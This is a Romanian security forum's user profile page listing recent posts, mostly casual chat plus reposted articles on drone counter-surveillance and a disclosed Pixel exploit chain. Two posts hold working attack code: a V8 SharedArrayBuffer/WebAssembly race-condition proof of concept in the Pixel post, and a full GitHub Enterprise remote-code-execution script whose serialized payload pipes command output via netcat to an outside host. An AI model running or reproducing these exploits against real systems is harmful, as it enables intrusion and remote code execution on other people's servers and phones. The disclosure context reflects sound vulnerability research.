Jump to content


Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won


Massaro last won the day on November 30 2017

Massaro had the most liked content!

Community Reputation

80 Excellent

About Massaro

  • Rank
    Registered user
  • Birthday 05/17/1996

Recent Profile Visitors

1434 profile views
  1. Modafinil ..etc

    Ori o parere din partea cuiva, ori...? Continuarea? Solutia este?
  2. Hotline,Linia erotica HELP

    Iti vorbesc eu cu ei, cat platesti?
  3. https://www.exploit-db.com/docs/english/43945-jailbreaking-ios-11.1.2-an-adventure-into-the-xnu-kernel.pdf Sursa se vede.
  4. iPhone 8

    De bateriile de pe iPhone ne plangem toti uneori, dar cand vine vorba de performanta... nu cred ca se plange nimeni. Cand vad pe cineva care se plange de iPhone, nu stiu la ce se refera; cred ca n-a avut in mana un iPhone minim o luna. In fine, everybody with their shit. Eu zic sa-ti iei iPhone 7 daca e OK ca n-ai Jack la el. Daca iti trebuie jack, ia-ti 6s. Eu zic ca n-o sa regreti.
  5. AS FLYING, CAMERA-WIELDING machines get ever cheaper and more ubiquitous, inventors of anti-drone technologies are marketing every possible idea for protection from hovering eyes in the sky: Drone-spotting radar. Drone-snaggingshotgun shells. Anti-drone lasers, falcons, even drone-downing drones. Now one group of Israeli researchers has developed a new technique for that drone-control arsenal—one that can not only detect that a drone is nearby, but determine with surprising precision if it's spying on you, your home, or your high-security facility. Researchers at Ben Gurion University in Beer Sheva, Israel have built a proof-of-concept system for counter-surveillance against spy drones that demonstrates a clever, if not exactly simple, way to determine whether a certain person or object is under aerial surveillance. They first generate a recognizable pattern on whatever subject—a window, say—someone might want to guard from potential surveillance. Then they remotely intercept a drone's radio signals to look for that pattern in the streaming video the drone sends back to its operator. If they spot it, they can determine that the drone is looking at their subject. In other words, they can see what the drone sees, pulling out their recognizable pattern from the radio signal, even without breaking the drone's encrypted video. "This is the first method to tell what is being captured in a drone's [first-person-view] channel" despite that encryption, says Ben Nassi, one of the Ben Gurion researchers who wrote a paper on the technique, along with a group that includes legendary cryptographer and co-inventor of the RSA encryption algorithm Adi Shamir. "You can observe without any doubt that someone is watching. If you can control the stimulus and intercept the traffic as well, you can fully understand whether a specific object is being streamed." The researchers' technique takes advantage of an efficiency feature streaming video has used for years, known as "delta frames." Instead of encoding video as a series of raw images, it's compressed into a series of changes from the previous image in the video. That means when a streaming video shows a still object, it transmits fewer bytes of data than when it shows one that moves or changes color. That compression feature can reveal key information about the content of the video to someone who's intercepting the streaming data, security researchers have shown in recent research, even when the data is encrypted. Researchers at West Point, Cornell Tech, and Tel Aviv University, for instance, used that feature as part of a technique to figure out what movie someone was watching on Netflix, despite Netflix's use of HTTPS encryption. The encrypted video streamed by a drone back to its operator is vulnerable to the same kind of analysis, the Ben Gurion researchers say. In their tests, they used a "smart film" to toggle the opacity of several panes of a house's windows while a DJI Mavic quadcopter watched it from the sky, changing the panes from opaque to transparent and back again in an on-off pattern. Then they showed that with just a parabolic antenna and a laptop, they could intercept the drone's radio signals to its operator and find that same pattern in the drone's encrypted data stream to show that the drone must have been looking at the house. In another test, they put blinking LED lights on a test subject's shirt, and then were able to pull out the binary code for "SOS" from an encrypted video focused on the person, showing that they could even potentially "watermark" a drone's video feed to prove that it spied on a specific person or building. All of that may seem like an elaborate setup to catch a spy drone in the act, when it could far more easily be spotted with a decent pair of binoculars. But Nassi argues that the technique works at ranges where it's difficult to spot a drone in the sky at all, not to mention determine precisely where its camera is pointed. They tested their method from a range of about 150 feet, but he says with a more expensive antenna, a range of more than a mile is possible. And while radar or other radio techniques can identify a drone's presence at that range, he says only the Ben Gurion researchers' trick actually know where it's looking. "To really understand what’s being captured, you have to use our method," Nassi says. Rigging your house—or body—with blinking LEDs or smart film panels would ask a lot of the average drone-wary civilian, notes Peter Singer, an author and fellow at the New America Foundation who focuses on military and security technology. But Singer suggests the technique could benefit high-security facilities trying to hide themselves from flying snoops. "It might have less implications for personal privacy than for corporate or government security," Singer says. DJI didn't respond to WIRED's request for comment. Nor did Parrot, whose drones Nassi says would also be susceptible to their technique. If the Ben Gurion researchers' technique were widely adopted, determined drone spies would no doubt find ways to circumvent the trick. The researchers note themselves that drone-piloting spies could potentially defeat their technique by, for instance, using two cameras: one for navigation with first-person streaming, and one for surveillance that stores its video locally. But Nassi argues that countermeasure, or others that "pad" video stream data to better disguise it, would come at a cost of real-time visibility or resolution for the drone operator. The spy-versus spy game of aerial drone surveillance is no doubt just getting started. But for the moment, at least, the Israeli researchers' work could give spying targets an unexpected new way to watch the watchers—through their own airborne eyes - WIRED.
  6. In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues. All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation. The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University. The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd. Technical details of a Pixel remote exploit chain The Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process. This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys). The RCE bug (CVE-2017-5116) New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access. The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time. i::wasm::ModuleWireBytes GetFirstArgumentAsBytes( const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) { ...... } else if (source->IsTypedArray()) { //--->source should be checked if it's backed by a SharedArrayBuffer // A TypedArray was passed. Local<TypedArray> array = Local<TypedArray>::Cast(source); Local<ArrayBuffer> buffer = array->Buffer(); ArrayBuffer::Contents contents = buffer->GetContents(); start = reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset(); length = array->ByteLength(); } ...... return i::wasm::ModuleWireBytes(start, start + length); } A simple PoC is as follows: <html> <h1>poc</h1> <script id="worker1"> worker:{ self.onmessage = function(arg) { console.log("worker started"); var ta = new Uint8Array(arg.data); var i =0; while(1){ if(i==0){ i=1; ta[51]=0; //--->4)modify the webassembly code at the same time }else{ i=0; ta[51]=128; } } } } </script> <script> function getSharedTypedArray(){ var wasmarr = [ 0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, 0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03, 0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e, 0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65, 0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01, 0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b, 0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b]; var sb = new SharedArrayBuffer(wasmarr.length); //---> 1)put WebAssembly code in a SharedArrayBuffer var sta = new Uint8Array(sb); for(var i=0;i<sta.length;i++) sta[i]=wasmarr[i]; return sta; } var blob = new Blob([ document.querySelector('#worker1').textContent ], { type: "text/javascript" }) var worker = new Worker(window.URL.createObjectURL(blob)); //---> 2)create a web worker var sta = getSharedTypedArray(); worker.postMessage(sta.buffer); //--->3)pass the WebAssembly code to the web worker setTimeout(function(){ while(1){ try{ sta[51]=0; var myModule = new WebAssembly.Module(sta); //--->4)parse the WebAssembly code var myInstance = new WebAssembly.Instance(myModule); //myInstance.exports.getAnswerPlus1(); }catch(e){ } } },1000); //worker.terminate(); </script> </html> Restul aici. Sursa la fel.
  7. Aici cititi. E destul de lung articolul. Sursa se vede.
  8. salut

    Salut. Sa-mi bag pula ca tineam click apasat sa vad daca nu-i vreun text ascuns culoare pe culoare.
  9. Fun stuff

    Tre' sa arate cumva ca se plang de salarii =)).
  10. DaniB - Night Fire (Official Full Stream)

    Te-ai dezvirginat pe piesa asta de-o impartasesti cu noi?
  11. Ce carti mai cititi?

    Un pdf pentru "Level 7" (Ultimatum - ultimele zile ale unui razboi atomic) de Mordecai Roshwald? Nu gasesc nicaieri, am vrut s-o cumpar dar pe unde am gasit-o nu o mai au pe stoc.

    "Numarul numarul numarul". Mi-ai adus aminte de "Si... solutia? Care este solutia? Solutia, domnilor?" Mihaitza boss. Mars :)))))))))
  13. Nice shit to wake up to, huh? Frumos.
  14. The Little MAC Attack

    Daca aveti putin mai mult timp liber, aruncati un ochi peste asta. E prea lung sa-i dau copy paste aici. Good read.
  15. #!/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "`id | nc orange.tw 12345`" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dump(code)[2..-1] + ":\x0c@lineno"+ "i\x00" + ":\x0C@method"+":\x0Bresult" ''' marshal_code = '\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`id | nc orange.tw 12345`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult' payload = [ '', 'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code), marshal_code, '', '' ] payload = map(quote, payload) url = 'http://0:8000/composer/send_email?to=orange@chroot.org&url=' print "\nGitHub Enterprise < 2.8.7 Remote Code Execution by orange@chroot.org" print '-'*10 + '\n' print url + '%0D%0A'.join(payload) print ''' Inserting WebHooks from: https://ghe-server/:user/:repo/settings/hooks Triggering RCE from: https://ghe-server/search?q=ggggg&type=Repositories ''' Sursa: https://www.exploit-db.com/exploits/42392/.